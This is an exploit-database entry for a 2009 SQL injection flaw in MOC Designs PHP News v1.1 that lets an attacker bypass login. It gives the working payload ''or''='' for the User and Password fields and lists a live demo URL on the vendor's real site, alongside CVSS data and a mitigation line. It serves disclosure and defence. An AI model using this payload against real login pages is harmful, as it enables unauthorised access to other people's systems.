header-logo
Suggest Exploit
vendor:
PHP News
by:
SirGod
7,5
CVSS
HIGH
SQL Injection (Auth Bypass)
89
CWE
Product Name: PHP News
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:moc_designs:php_news:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability

MOC Designs PHP News v1.1 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a crafted input to the 'User' and 'Password' fields of the login page. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#########################################################################
[+] MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#########################################################################

[+] Homepage : http://www.mocdesigns.com/

[+] SQL Injection (Auth Bypass)

 - PoC

    http://127.0.0.1/news/login.php

 User : 'or''='
 Password : 'or''='

 - Live Demo

    http://www.mocdesigns.com/news/login.php

#########################################################################

# milw0rm.com [2009-08-04]